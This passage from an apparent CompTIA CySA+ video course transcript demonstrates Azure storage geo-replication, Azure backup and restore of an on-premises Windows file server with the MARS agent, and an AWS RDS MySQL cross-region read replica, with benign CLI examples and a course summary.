So, I'll search for storage account, and I'll select it from the list, and I'll choose the Create button.
[Video description begins] He types the text "storage account" in the search bar and selects the search option
labeled "Storage account - blob, file, table, queue". A page labeled "Storage account - blob, file, table, queue"
opens in the content pane. It includes a button labeled "Create". [Video description ends]
One of the things I'll have to specify when I create the storage account is the Resource group into which it is
deployed.
[Video description begins] He clicks the "Create" button and a page labeled "Create storage account" opens
in the content pane. It is divided into two parts. The first part contains options labeled "Basics", "Networking",
"Advanced", "Tags", and "Review + create". The second part is the content pane. The "Basics" option is
already selected and the corresponding page is open in the content pane. It is divided into three sections. The
first section labeled "Project details". It includes a drop-down option labeled "Resource group". The second
section labeled "Instance details". It includes a textbox labeled "Storage account name" and drop-down
options labeled "Location" and "Replication". The third section includes an option labeled "Next: Networking
>". [Video description ends]
A Resource group is simply a way to organize related cloud resources for management purposes.
[Video description begins] He clicks the "Resource group" drop-down option and the drop-down list opens. It
includes options labeled "RG1" and "RG1-asr". [Video description ends]
[Video description begins] He selects the "RG1" option. [Video description ends]
I'm going to call this storacctyhz1. Down below, the Location, where will this be stored physically?
[Video description begins] He types the text "storacctyhz1" in the "Storage account name" textbox. [Video
description ends]
Now you have to consider regulatory compliance and data sovereignty issues where you might be required to
store cloud-based data within national boundaries.
[Video description begins] He clicks the "Location" drop-down option and the drop-down list opens. It
includes options labeled "(US) East US" and "(US) East US 2". [Video description ends]
In this case, I'm going to leave it with the default selection of (US) East US.
[Video description begins] He selects the "(US) East US" option. [Video description ends]
But down below, I'm interested in the Replication type, because we have a number of options here. For
example, we can choose Geo-redundant storage (GRS).
[Video description begins] He clicks the "Replication" drop-down option and the drop-down list opens. It
includes options labeled "Geo-redundant storage (GRS)" and "Locally-redundant storage (LRS)". [Video
description ends]
[Video description begins] He selects the "Geo-redundant storage (GRS)" option. [Video description ends]
Basically, within a physical area there are three copies of the data, but then there's also another copy of the data maintained in a different geographic location. Now, we can set this during the creation of the cloud storage account in Azure, or change it after the fact. We're going to do it after the fact just so we can see how we might change it.
[Video description begins] He selects the "Locally-redundant storage (LRS)" option. [Video description ends]
So, I'm going to leave it on the Locally-redundant storage (LRS), which does not copy or synchronize data
across regions. I'll click Next.
[Video description begins] He clicks the "Next: Networking>" button. The "Networking" option gets selected
from the first part and the corresponding page opens in the content pane. It includes a button labeled "Next:
Advanced >". [Video description ends]
I'm going to leave the default for the Networking. I'll click Next again. Same with Advanced, I'll leave all that.
[Video description begins] He clicks the "Next: Tags>" button. The "Advanced" option gets selected and the
corresponding page opens in the content pane. It includes a button labeled "Next: Advanced >". [Video
description ends]
And I'm not going to tag it. I'll click Next : Review + create.
[Video description begins] He clicks the "Next: Tags >" button. The "Tags" option gets selected and the
corresponding page opens in the content pane. It includes a button labeled "Next: Review + create >". [Video
description ends]
So, I'll go ahead and click the Create button to create the storage account. And before too long we'll get a
message about the deployment being complete.
So, I'm going to click the Go to resource button so we can open up the properties of that storage account.
[Video description begins] He clicks the "Go to resource" button. The blade labeled "storacctyhz1" opens. It is
divided into two parts. The first part is the navigation pane. It includes options labeled "Overview" and
"Settings". The "Settings" option further includes options labeled "Geo-replication" and "Configuration". The
"Overview" option is already selected and the corresponding page is open in the content pane. It includes tiles
labeled "Containers" and "File shares". [Video description ends]
Now what I'm interested in here is first of all in the properties of the storage account, we could go into the
details of the storage account such as Containers.
[Video description begins] He clicks the "Containers" tile and the blade labeled "storacctyhz1 - Containers"
opens in the content pane. It is divided into two parts. The first part includes an option labeled "+ Container"
and the second part includes a search bar. [Video description ends]
And we could make folders, so I could click + Container to add a container or folder and then upload content. This can also be
done programmatically. So, there are many ways to populate the storage account with actual data. We're not
going to focus on that here, we're more interested in the availability aspect through replication. So, if I were to
scroll down in the left-hand navigator under Settings, I've got a Geo-replication option for this storage account.
[Video description begins] He clicks the "Geo-replication" option from the navigation pane and the
corresponding page opens in the content pane. It includes a world map with a pin labeled "Primary location"
and the text "Locally-redundant storage (LRS) under the heading labeled "Replication". [Video description
ends]
And I can see currently that it's in the US East area. That's where we deployed the storage account, but I don't
have an option to change it. Well, that's because it's currently set as Locally-redundant storage (LRS). So, I'm
going to click the Configuration link over on the left. And from here, among other things, we will have the
option to change the replication strategy. So, currently we can see Replication is Locally-redundant storage,
I'm simply going to change it to Geo-redundant storage, not going to change anything else.
[Video description begins] He clicks the "Configuration" option from the navigation pane and the
corresponding page opens in the content pane. It includes a drop-down option labeled "Replication" and
buttons labeled "Save" and "Discard". [Video description ends]
So, then at the top, I'll just click the Save button and wait for it to take effect. And it says updated the storage
account, it may take up to 30 seconds before it's actually in effect.
[Video description begins] He clicks the "Save button". The pop-up box labeled "Successfully updated storage
account" appears. [Video description ends]
Well, if I click on the Geo-replication link over on the left, we can see that we now have two pinpoints on the
map.
[Video description begins] The page labeled "storacctyhz1 - Geo-replication" opens in the content pane. It
includes a world map with two pins labeled "Primary location" and "Secondary location". It also includes a
table. The table contains two rows and four columns. The column headers labeled "Location", "Data center
type", "Status", and "Failover". It includes the row entries labeled "West US", "Secondary", and "Available"
under the column headers "Location", "Data center type", and "Status", respectively. [Video description ends]
Now, we started off with US East, that's the blue pinpoint, that's where we originally deployed our storage account. Now we've got a second one, which appears to be somewhere around California, on the West Coast of North America. So, if I scroll down, I can see in the legend that, indeed, we've got West US as a secondary region where the contents of the storage account are now being replicated. So, should there be a problem on the East Coast, we now have, or soon will have, an up-to-date replicated copy of the data on the West Coast.
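For reference, the same workflow can be scripted instead of clicked through. Here's a minimal Azure CLI sketch, assuming you've already run az login and that the RG1 resource group from this demo exists; the account name is the one used above:

  # Create the storage account with locally-redundant storage (LRS).
  az storage account create \
    --name storacctyhz1 \
    --resource-group RG1 \
    --location eastus \
    --sku Standard_LRS

  # Later, switch the replication type to geo-redundant storage (GRS).
  az storage account update \
    --name storacctyhz1 \
    --resource-group RG1 \
    --sku Standard_GRS

  # Confirm the primary and secondary locations.
  az storage account show \
    --name storacctyhz1 \
    --resource-group RG1 \
    --query "{sku:sku.name, primary:primaryLocation, secondary:secondaryLocation}"

Just as in the portal, the secondary location is chosen by Azure as the region paired with the primary, so you don't specify West US explicitly.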
In this video, learn how to register a Windows Server with Microsoft Azure for backup.
Objectives
[Video description begins] Topic title: Backing up to the Cloud. Your host for this session is Dan
Lachance. [Video description ends]
Backing up on-premises data to the cloud has become more and more prevalent because it's simple, cost-effective, and it also serves as an off-site backup.
[Video description begins] The Microsoft Azure portal opens. It is divided into two parts. The first part
includes a search bar. The second part is the content pane. It includes a section labeled "Recent resources". It
further contains a table. The table contains three columns and five rows. The column headers labeled "Name",
"Type", and "Last viewed". It includes a row entry labeled "Vault1" under the column header "Name". [Video
description ends]
So, to get started here in Microsoft Azure, we're going to be backing up an on-premises file server into the
Microsoft Azure Cloud. Now what needs to be in place first is a Recovery Services vault, which I've already
created, and it's named Vault1. So, I'm going to click on Vault1 to open up its properties.
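As an aside, if you prefer scripting to the portal, a Recovery Services vault like Vault1 can also be created with the Azure CLI. This is only a sketch, assuming you've signed in with az login and that an RG1 resource group already exists:

  # Create a Recovery Services vault named Vault1 in the East US region.
  az backup vault create \
    --resource-group RG1 \
    --name Vault1 \
    --location eastus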
[Video description begins] He clicks the row entry "Vault1" and a blade labeled "Vault1" opens in the content
pane. It is divided into two parts. The first part is the navigation pane. It includes options labeled "Getting
started" and "Protected items". The "Getting started" option includes a "Backup" option and the "Protected
items" option includes "Backup items" option. [Video description ends]
In the left-hand navigator, down under Getting started on the left, I'm going to click on Backup.
[Video description begins] He clicks the "Backup" option and the corresponding page opens in the content
pane. It is divided into two sections. The first section contains drop-down options labeled "Where is your
workload running?" and "What do you want to backup?". The second section is titled as "Step: Configure
Backup". It contains a button labeled "Backup". [Video description ends]
It asks where the workload is running. For example, we could back up an Azure Virtual machine or an Azure
SQL server and continue on our way by clicking the Backup button. But here, in this case, I'm going to select
On-Premises.
[Video description begins] He clicks the "Where is your workload running?" drop-down option and a drop-
down list opens. It includes an option labeled "On-Premises". He selects the "On-Premises" option. [Video
description ends]
And it asks what I want to back up from On-Premises. We have a number of options.
[Video description begins] He clicks the "What do you want to backup?" drop-down option and a drop-down
list opens. It includes several options. [Video description ends]
We can back up Files and Folders, VMware and Hyper-V Virtual Machines, Microsoft SQL Server,
SharePoint, Exchange, and so on. In this case, what I want to do to increase my data availability is back it up
into the cloud. So, that's for files running on file server. So, I'm going to choose Files and folders, make sure
that's selected, and then I'm going to click the Prepare Infrastructure button.
[Video description begins] He selects "Files and folders" option. A button labeled "Prepare Infrastructure"
appears in the second section.[Video description ends]
Now, that opens up another screen where the first thing I have to do is download the Recovery Services agent.
[Video description begins] A page labeled "Prepare infrastructure" opens in the content pane. It includes five
steps and a link labeled "Download Agent for Windows Server or Windows Client". [Video description ends]
So, the Microsoft Azure Recovery Services Agent is called the MARS Agent.
[Video description begins] He points to the "Download Agent for Windows Server or Windows Client"
link. [Video description ends]
And we've got a link here to download it onto the operating system of that on-premises file server.
[Video description begins] A folder labeled "Downloads" is open in the "File Explorer window". The folder
contains an application labeled "MARSAgentInstaller". [Video description ends]
So, now that I've downloaded the MARS Agent installer on my on-premises file server, I'm going to go ahead and run it as administrator to actually install it.
[Video description begins] He right clicks the Name "MARSAgentInstaller" and shortcut menu opens. He
clicks the option labeled "Run as administrator". [Video description ends]
Now part of the installation is going to be to register this on-premises file server with the Microsoft Azure
Recovery Services Vault. So, I'm going to accept the default.
[Video description begins] The wizard labeled "Microsoft Azure Recovery Services Agent Setup Wizard"
opens. It is divided into two parts. The first part labeled "Installation Stages". It contains four steps labeled
"Installation Settings", "Proxy Configuration", "Microsoft Update Opt-In", and "Installation". The
"Installation Settings" step is already selected and the corresponding page is open in the second part. It
includes a button labeled "Next >".[Video description ends]
The first screen asks for the installation location, which I'll accept. On the next screen, I don't have a proxy server to go through to get to the Internet, so I'll leave that as is.
[Video description begins] He clicks the "Next >" button. The "Proxy Configuration" step gets selected and
the corresponding page opens in the second part. It includes a button labeled "Next >". [Video description
ends]
[Video description begins] The "Microsoft Update Opt-In" step gets selected and the corresponding page
opens in the second part. It includes a radio button labeled "Use Microsoft Update when I check for updates
(recommended)" and a button labeled "Next >". [Video description ends]
[Video description begins] He selects the "Use Microsoft Update when I check for updates (recommended)"
radio button. [Video description ends]
[Video description begins] He clicks the "Next >" button. The "Installation" step gets selected. It includes a
button labeled "Install". [Video description ends]
[Video description begins] He clicks the "Install" button and the installation process gets started. [Video
description ends]
So, at this point, it's installing the MARS Agent. But remember, we're not quite finished after the installation,
because we've not yet registered the server with the Recovery Services Vault for backup purposes and we need
to do that.
[Video description begins] The installation process gets completed and the buttons labeled "Proceed to
Registration" and "Close" appear. [Video description ends]
So, before too long, the file copy portion will complete and we'll have a Proceed to Registration button which I
will click.
[Video description begins] He clicks the "Proceed to Registration" button. A wizard labeled "Vault
Identification" opens. It is divided into two parts. The first part contains three steps. The steps labeled "Vault
Identification", "Encryption Setting", and "Server Registration". The "Vault Identification" step is already
selected and the corresponding page is open in the second part. It includes a textbox labeled "Vault
Credentials" and buttons labeled "Browse" and "Finish". [Video description ends]
[Video description begins] He switches back to the "Prepare infrastructure" page. He points to the second
step. It includes a checkbox labeled "Already downloaded or using the latest Recovery Services Agent" and a
button labeled "Download". [Video description ends]
Now back here in the Azure portal where we downloaded the agent, in step two, we can tell it that we've
already downloaded the agent which we have, and we can then download the vault credentials file.
[Video description begins] He selects the "Already downloaded or using the latest Recovery Services Agent"
checkbox. [Video description ends]
The vault credentials file is used to authenticate the server and register it with the vault, but it expires after 2
days.
[Video description begins] He switches back to the "Register Server Wizard". [Video description ends]
So, now that I've downloaded the vault credentials file, here in the wizard, I'm going to click the Browse
button. I have put it in the Downloads folder.
[Video description begins] The "File Explorer" window opens. [Video description ends]
Remember it's only good for two days, I'm going to select the vault credentials file.
[Video description begins] He clicks the folder labeled "Downloads". [Video description ends]
It's going to validate it, it knows the name of the vault, the location and so on.
[Video description begins] He clicks the "Open" button and the Vault credentials starts getting
validated. [Video description ends]
[Video description begins] The "Encryption Setting" step gets selected and the corresponding page opens in
the second part. It includes textboxes labeled "Enter Passphrase (minimum of 16 characters)" and "Confirm
Passphrase", a drop-down list box labeled "Enter a location to save the passphrase", and a button labeled
"Generate Passphrase". [Video description ends]
And, at this point, it wants me to either specify a passphrase or let it generate a passphrase that's going to be
used to encrypt and decrypt backups on this server. So, I'm going to choose Generate Passphrase and I'm going
to enter a location to save it.
[Video description begins] He selects the "Generate Passphrase" button and the passphrases gets filled in
both the textboxes. [Video description ends]
Now, if you're saving the passphrase locally on this server, you need to make sure that you back it up and store a copy elsewhere. So, I'm going to click Finish. It warns me, and I'm going to say yes, I want to continue.
[Video description begins] A pop-up box labeled "Microsoft Azure Backup" opens. It includes a text "Do you
want to continue?" and buttons labeled "Yes" and "No". [Video description ends]
And it's now registering the server with the Azure Recovery Services Vault.
[Video description begins] He clicks the "Yes" button. The "Server Registration" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Close". [Video description ends]
We can then see the backup passphrase file name, and we have a warning about storing passphrases locally; they should also be stored elsewhere. That's fine. The Launch Microsoft Azure Recovery Services Agent option is turned on, so I'm going to click Close.
[Video description begins] The "Register Server Wizard" closes. [Video description ends]
[Video description begins] A window labeled "Microsoft Azure Backup" opens. It is divided into two parts.
The first part is the content pane. The second part is the navigation pane labeled "Actions". It includes the
options labeled "Schedule Backup", "Recover Data", and "Back Up Now". [Video description ends]
So, at this point, we are now ready to configure backup. So, for example, I could choose the Schedule Backup
button, which I'm going to do.
[Video description begins] He clicks the "Schedule Backup" button. A wizard labeled "Schedule Backup
Wizard" opens. It is divided into two parts. The first part includes steps labeled "Getting started", "Select
Items to Backup", "Specify Backup Schedule (Files and Folders)", "Select Retention Policy (Files and
Folders)", "Choose Initial Backup Type (Files and Folders)", "Confirmation", and "Modify Backup Progress".
The "Getting started" step is already selected and the corresponding page is open in the second part. The
second part includes a button labeled "Next >". [Video description ends]
[Video description begins] He clicks the "Next" button. The "Select Items to Backup" step gets selected and the
corresponding page is open in the second part. It includes buttons labeled "Add Items" and "Next >". [Video
description ends]
So, let's say we're going to go through and add some items that we want to back up.
[Video description begins] He clicks the "Add Items" button and a dialog box labeled "Select Items" opens. It
includes a button labeled "OK". [Video description ends]
Let's say, I want to take some contents of drive C from this host and back it up to the cloud. So, I'm going to
select drive C and expand it, and I've got a folder here called ProjectA_Files. I could expand that and see the
individual items and select them for backup to the cloud.
[Video description begins] He selects the folder labeled "ProjectA_Files", which includes the files labeled
"ProjectA_Budget.xls" and "ProjectA_ContactList.txt".[Video description ends]
But I'm going to choose the folder, which selects the subordinate items within it, and I'll click OK.
[Video description begins] The "Select Items" dialog box closes. [Video description ends]
[Video description begins] The "Specify Backup Schedule (Files and Folders)" step gets selected and the
corresponding page opens in the second part. It includes radio buttons labeled "Day" and "Week" under the
label: Schedule a backup every. The "Day" radio button is already selected. The second part also includes
three drop-down list boxes under the label: At following times (Maximum allowed is three times a day)" and
the button labeled "Next >". [Video description ends]
And we have our scheduling. We can back it up daily or weekly. I'm going to leave it on daily, assuming that we have to adhere to a daily RPO, or recovery point objective. We can also specify up to three times a day when we want to back this up, again in conjunction with our recovery point objective.
[Video description begins] He clicks the second drop-down list box and the drop-down list opens. It includes
several options. He selects the option labeled "2:00 PM". [Video description ends]
So, once I've selected the options, I'll click Next. We can determine the weekly, monthly, and yearly retention
policy for the data.
[Video description begins] The "Select Retention Policy (Files and Folders)" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Next >". [Video description ends]
I'm going to leave the default selections, and I'll click Next.
[Video description begins] The "Choose Initial Backup Type (Files and Folders)" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Next >". [Video description ends]
We're going to transfer this over the network, that is, over our Internet connection to the cloud.
[Video description begins] He clicks the "Next >" button. The "Confirmation" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Finish". [Video description ends]
And then we're on the summary confirmation screen and I'll click Finish.
[Video description begins] He clicks the "Finish" button. The "Modify Backup Progress" step gets selected
and the corresponding page opens in the second part. It includes a button labeled "Close". [Video description
ends]
[Video description begins] A status message labeled "You have successfully created a backup schedule" is displayed.
He clicks the "Close" button and the "Schedule Backup Wizard" closes. [Video description ends]
However, we haven't yet backed up anything. So, I could wait for the schedule or I could choose Backup Now.
[Video description begins] He clicks the "Back Up Now" option and a wizard labeled "Back Up Now" opens.
It is divided into two parts. The first part contains four steps. The steps labeled "Select Backup Item", "Retain
Backup Till", "Confirmation", and "Backup progress". The "Select Backup Item" step is already selected and
the corresponding page is open in the second part. The second includes a button labeled "Next >". [Video
description ends]
[Video description begins] He clicks the "Next >" button. The "Retain Backup Till" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Next". [Video description ends]
And I can specify how long I want to retain the backup, so I'll accept the defaults.
[Video description begins] He clicks the "Next >" button. The "Confirmation" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Back Up". [Video description ends]
It knows what I want to back up based on my schedule. So, I'll click Back Up, and it's on its way.
[Video description begins] The "Backup progress" step gets selected and the corresponding page opens in the
second part. It includes a button labeled "Close". [Video description ends]
It's backing up to the cloud now on demand. And it won't take too long before the job is completed.
[Video description begins] The "Back Up Now Wizard" closes. [Video description ends]
[Video description begins] The content pane of the "Microsoft Azure Backup" appears. He points to the row
entry: Backup under the column header: Message in the content pane. [Video description ends]
We can see that we do have a backup job that has completed successfully, and the backed-up data is stored in Azure.
[Video description begins] He switches back to the "Vault1 - Backup" blade. [Video description ends]
Back here in the Azure portal, we can scroll down and under Protected items, if I click Backup items, we're
going to see that there's a reference to an Azure Backup Agent which corresponds to the one that we installed.
[Video description begins] He clicks the "Backup items" option and the corresponding page opens in the
content pane. It includes a table. The table contains several rows and two columns. The column headers
labeled "BACKUP MANAGEMENT TYPE" and "BACKUP ITEM COUNT". The table includes a row entry
labeled "Azure Backup Agent" and "1" under the column headers "BACKUP MANAGEMENT TYPE" and
"BACKUP ITEM COUNT" respectively. [Video description ends]
If I click it, we can see we're backing up some data from a specific server, that data source is on drive C.
[Video description begins] He clicks the row entry "Azure Backup Agent". A new blade labeled "Backup Items
(Azure Backup Agent)" opens. It includes a table. The table contains one row and four columns. The column
headers labeled "Backup item", "Protected server", "Last backup", and "Last Backup Time". The table also
includes row entries labeled "C:\" and "winsrv1." under the column headers labeled "Backup item" and
"Protected server" respectively. [Video description ends]
We can also see the last backup date and time.
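If you'd rather check on protected items from a script than from the portal, something like the following Azure CLI sketch may work; it assumes the vault is Vault1 in resource group RG1, and that MAB (the management type used for the Microsoft Azure Recovery Services/MARS agent) is accepted by your CLI version:

  # List on-premises servers registered with the vault through the MARS agent.
  az backup container list \
    --resource-group RG1 \
    --vault-name Vault1 \
    --backup-management-type MAB \
    --output table

  # List the backup items (such as C:\) protected by the MARS agent.
  az backup item list \
    --resource-group RG1 \
    --vault-name Vault1 \
    --backup-management-type MAB \
    --output table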
After completing this video, you will be able to recognize how backups provide availability through disaster
recovery.
Objectives
[Video description begins] Topic title: System and Data Recovery. Your host for this session is Dan
Lachance. [Video description ends]
Data availability is an important part of every organization's security strategy. It relates to the RPO, the
recovery point objective, which states the maximum tolerable amount of data loss in terms of time. So, here on
my on-premises file server, I've already installed the Microsoft Azure Recovery Services, or MARS Agent.
The MARS Agent is required to register the server with an Azure Cloud-based vault, a Recovery Services
vault, for backup and restore purposes. When you install the MARS Agent, it also puts this Microsoft Azure Backup icon on the desktop of that server. I'm going to launch that Azure Backup icon.
[Video description begins] The "Microsoft Azure Backup" window opens. The content pane is divided into
several sections. The first section labeled "Jobs (Activity in the past 7 days, double click on the message to see
details)" contains two tabs. The tabs labeled "Jobs" and "Alerts". The "Jobs" tab is selected and the
corresponding page is open. It contains a table. The table contains two rows and four columns. The column
headers labeled "Status", "Time", "Message", and "Description". He points to the row entries labeled
"Backup" and "Job completed" under the column headers "Message" and "Description" respectively. [Video
description ends]
Now here I can see that we've got a backup job and a recovery job that have already completed. So, what I
want to do is perform a recovery. So, I'm going to choose the Recover Data button over in the Actions panel on
the right.
[Video description begins] He clicks the "Recover Data" button from the navigation pane. A wizard labeled
"Recover Data Wizard" opens. It is divided into two parts. The first part contains four steps labeled "Getting
Started", "Select Recovery Mode", "Select Volume and Date", and "Browse And Recover Files". The "Getting
Started" step is already selected and the corresponding page is open in the second part. The second part
includes a button labeled "Next >". [Video description ends]
We can choose the default to recover to this server where the data was originally backed up from. Or we can
choose to restore to a different server. I'll leave it on this server and I'll click Next.
[Video description begins] He clicks the "Next >" button. The "Select Recovery Mode" step gets selected and
the corresponding page opens in the second part. It includes a button labeled "Next >" [Video description
ends]
We can recover individual files and folders, or an entire volume or System state if we backed it up. In this
case, I'm going to leave it on Individual files and folders. Maybe there's only a single item I want to restore
from that Cloud-based backup. So, I'll click Next.
[Video description begins] The "Select Volume and Date" step gets selected and the corresponding page opens
in the second part. It contains a drop-down list option labeled "Select the volume". [Video description ends]
[Video description begins] He clicks the "Select the volume" drop-down list box and the drop- down list opens.
It contains an option labeled "C:\". He clicks the "C:/" option and a section labeled "Available backups"
appears. It includes a button labeled "Mount", a "calendar", a field labeled "Backup date:", and a drop-down
list box labeled "Time:". The Backup date labeled "2/26/2020" is already selected in the calendar. [Video
description ends]
And on the calendar, I can see the bold date here represents when there's a valid backup. And when I select
that date on the calendar, I have to choose the backup time. Because we can have backups scheduled for up to
three times daily. So, when I've selected that, I can click Mount to mount that backup set. Now, that's going to
mount it as a recovery volume.
[Video description begins] The "Browse And Recover Files" step gets selected and the corresponding page
opens in the second part. It includes buttons labeled "Browse" and "Unmount". [Video description ends]
After a moment, we can see the recovery volume has been mounted as a virtual disk on this host and we can
browse it to recover items. So, down below, I can click the Browse button.
[Video description begins] A pop-up box labeled "Tip: Use Robocopy" appears. It includes a button labeled
"OK". [Video description ends]
And then I'll click OK. And we can now see that we've got a mounted volume.
[Video description begins] The "File Explorer" window opens. [Video description ends]
If we just kind of expand that, we can see it's listed over here as Drive F on this host. We can see what was
backed up. In this case, a folder called ProjectA_Files, in which we can see actual backed up files.
[Video description begins] He clicks the "ProjectA_Files" folder. It contains files labeled
"ProjectA_Budget.xls" and "ProjectA_ContactList.txt". [Video description ends]
So, from this point, we could simply right-click and choose to Copy items from the backup set and paste it
wherever we choose to restore that data.
[Video description begins] He right-clicks the "ProjectA_ContactList.txt" file. [Video description ends]
Once we're finished, we can then unmount that recovery volume.
[Video description begins] He closes the "File explorer" window. [Video description ends]
And that's it, that's all you need to do to recover data that was backed up from an on-premises file server to the Azure cloud.
[Video description begins] He clicks the "Unmount" button. A dialog box labeled "Confirm Recovery Volume
Unmount" opens. It contains buttons labeled "Yes" and "No". He clicks the "Yes" button and the dialog box
closes. [Video description ends]
During this video, you will learn how to create a MySQL database read replica in a secondary region.
Objectives
[Video description begins] Topic title: Database Replicas. Your host for this session is Dan Lachance. [Video
description ends]
Amazon Web Services, or AWS, uses the Relational Database Service, or RDS, to facilitate the deployment of
database solutions in the cloud.
[Video description begins] A web page labeled "AWS Management Console" opens in the web browser. It is
divided into two parts. The first part includes the drop-down options labeled "Services" and Resource
Groups". The second part is a content pane. It is labeled "AWS Management Console". It includes tiles labeled
"AWS services" and "Access resources on the go". The "AWS services" tile includes a search bar labeled
"Find services". [Video description ends]
Now I've already done this for a MySQL deployment. So, I'm going to go ahead and search here in the AWS Management Console for rds. That's the managed Relational Database Service.
[Video description begins] He types the text "rds" in the search bar and various search options appear. It
includes "RDS" option. [Video description ends]
Managed means in this context that we don't have to worry about setting up the underlying virtual machines to
support MySQL databases. We don't have to install the MySQL database software, it's already done. So, I'm
going to click on RDS.
[Video description begins] A web page labeled "RDS . AWSConsole" opens in the web browser. It is divided
into three parts. The first part is the taskbar. It includes a drop-down button labeled "N.Virginia". The second
part is the navigation pane labeled "Amazon RDS". It includes the options labeled "Dashboard" and
"Databases". The third part is the content pane. [Video description ends]
Now what I want to do is see which database instances I have deployed currently.
[Video description begins] He clicks the "Databases" option and the corresponding information opens in the
content pane. It includes a drop-down button labeled "Actions" and a table. The table includes one row and
several columns. It also includes column headers labeled "DB identifier" and "Engine". Adjacent to the row is
a radio button. The table also includes the row entries labeled "database-1" and "MySQL Community" under
the column headers "DB identifier" and "Engine" respectively. [Video description ends]
So, I'm going to click on Databases on the left and we have a DB identifier called database-1.
[Video description begins] He selects the radio button. The complete row in the table gets selected. [Video
description ends]
We can see that the Engine here is MySQL. What I want to do here to increase availability for any data stored
in that MySQL database is to create a replica. Now, I can choose to create a read replica in an alternate location, which really gives me dual benefits. First, I have an up-to-date copy of the replicated data elsewhere. And second, if that alternate region is a read-heavy environment, such as for querying, then we can have a read replica there to serve those reads. So, that's where we get our dual benefit.
[Video description begins] He points to the radio button. [Video description ends]
[Video description begins] He clicks the "Actions" drop-down button and a drop-down list opens. It includes
an option labeled "Create read replica". [Video description ends]
I'm going to go to the Actions menu where I have the option to create a read replica.
[Video description begins] He clicks the "Create read replica" option. The corresponding page labeled
"Create read replica DB instance" opens. It includes several sections labeled "Instance specifications",
"Network & Security", "Encryption", "Settings", and "Database options" and a button labeled "Create read
replica". [Video description ends]
When I do that, it's almost as if I'm deploying a brand new database instance here for MySQL, where I see a lot of the things I would've seen originally before I even had it deployed in the cloud.
[Video description begins] He points to the "Instance specifications" section. It includes a drop-down list box
labeled "DB instance class" where an option labeled "db.r5.large - 2 vCPU, 16 GiB RAM" is already
selected. [Video description ends]
So, I can select the DB instance class, which identifies the underlying horsepower. So, virtual CPUs and RAM.
And I can determine, as we go further and further down, the Destination region.
[Video description begins] He points to the "Network & Security" section. It includes a drop-down list box
labeled "Destination region" where an option labeled "US East (N. Virginia)" is already selected. It also
includes radio buttons labeled "Yes" and "No" under the heading labeled "Publicly accessible". The "No"
radio button is already selected. [Video description ends]
Now, currently the region that we are in is shown up here in the upper right in the Amazon Web Services
console, US East (N. Virginia).
[Video description begins] He clicks the "Destination region" drop-down list box and the drop-down list
opens. It includes options labeled "US East (N. Virginia)" and "Canada (Central)". [Video description ends]
Well, I'm going to make sure that I replicate this to an alternate location, such as Canada (Central).
[Video description begins] He changes the options from "US East (N. Virginia)" to "Canada (Central)" in the
"Destination region" drop-down list box. [Video description ends]
Now when I do that, I can scroll down and determine whether I want that read-only replica to be publicly
accessible. And whether I want to use a specific key for encrypting it, there's a lot of different settings
available here. One of which I'm going to have to specify is the database instance identifier.
[Video description begins] He points to the "Settings" section. It contains a drop-down list box labeled "Read
replica source" where option labeled "database-1" is already selected and a textbox labeled "DB instance
identifier". [Video description ends]
The source is database-1. So, I'm going to call the replica database-1-replica1.
[Video description begins] He types the text "database-1-replica1" in the "DB instance identifier"
textbox. [Video description ends]
[Video description begins] He points to the "Database options" section. It includes a spin box labeled
"Database port" where option labeled "3306" is already selected by default. [Video description ends]
But connecting on that port is only going to work if you're already connected to the virtual network in the cloud, because public accessibility is turned off here.
[Video description begins] In the "Network & Security" section, he points to the "No" radio button under the
heading labeled "Publicly accessible". [Video description ends]
We can always turn that on after if we really needed to. I'm not going to make any other changes here, so really
all I want to do here is click Create read replica.
[Video description begins] He scrolls through the page. [Video description ends]
[Video description begins] He clicks the "Create read replica" button. The corresponding page labeled
"Create read replica DB instance" opens. It includes a button labeled "Close". [Video description ends]
So, back here in the RDS console, I can click on my original MySQL database identifier.
[Video description begins] The "Create read replica DB instance" page closes. The "RDS . AWS Console"
page appears. [Video description ends]
So, I'll click right on the link to open that up.
[Video description begins] He clicks the row entry labeled "database-1". The corresponding page labeled
"database-1" opens. It includes a section labeled "Replication (2)". [Video description ends]
And when I scroll down a little bit, we're going to eventually come across Replication, where we can see that we've got our original Master instance in the US East region.
[Video description begins] He points to the "Replication (2)" section. It includes a table. The table contains
two rows and six columns. It includes the column headers labeled "DB instance", "Role", and "Zone". The first
row includes the row entries labeled "database-1", "Master", and "us-east-1a" under the column headers "DB
instance", "Role", and "Zone" respectively. The second row includes the row entries labeled "database-1-
replica1 (Central)", "Replica", and "ca-central-1" respectively. [Video description ends]
So, the zone is us-east-1a but the region is US East. And we can see we've got a replica, there's the name of our
replica, which is in a different location. It's in Canada Central. So, in this way, we've achieved high availability
for the content stored within that cloud-based MySQL database instance.
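The same cross-region read replica could be created from the AWS CLI rather than the console. The following is a sketch only; the account ID in the ARN is a placeholder, and the instance identifiers match this demo. For a cross-region replica, the source instance is referenced by its ARN:

  # Create a read replica of database-1 (in us-east-1) in the ca-central-1 region.
  aws rds create-db-instance-read-replica \
    --db-instance-identifier database-1-replica1 \
    --source-db-instance-identifier arn:aws:rds:us-east-1:123456789012:db:database-1 \
    --source-region us-east-1 \
    --region ca-central-1 \
    --no-publicly-accessible

  # From the source region, confirm the replica is attached to the master.
  aws rds describe-db-instances \
    --db-instance-identifier database-1 \
    --region us-east-1 \
    --query "DBInstances[0].ReadReplicaDBInstanceIdentifiers"

And because we left public accessibility turned off, any client connecting to the replica's endpoint on port 3306 would have to be inside, or connected to, the virtual network in the Canada (Central) region.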
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, we've examined risk identification and prioritization, and planning for secure IT systems and
data, all in an effort to minimize the impact of business disruptions to an organization. We did this by exploring structured risk management frameworks, the importance of a risk register, and various risk treatments. We talked about disaster recovery strategies and solutions that provide high availability, about cybersecurity insurance as a form of risk transference, and about the characteristics of a business continuity plan and a business impact analysis. We looked at how to proactively design an incident response plan and how to conduct post-incident activities. We looked at how to enable Microsoft Azure storage account
replication, how to register a Windows Server with Azure for backup, and how backups provide availability
through recovery. And finally, we looked at how to create a MySQL database read replica in a secondary
geographical region.
In our next course, we'll move on to explore how a variety of different malicious attacks are executed so
security technicians are better able to provide effective countermeasures.
CompTIA Cybersecurity Analyst+: Attack Types
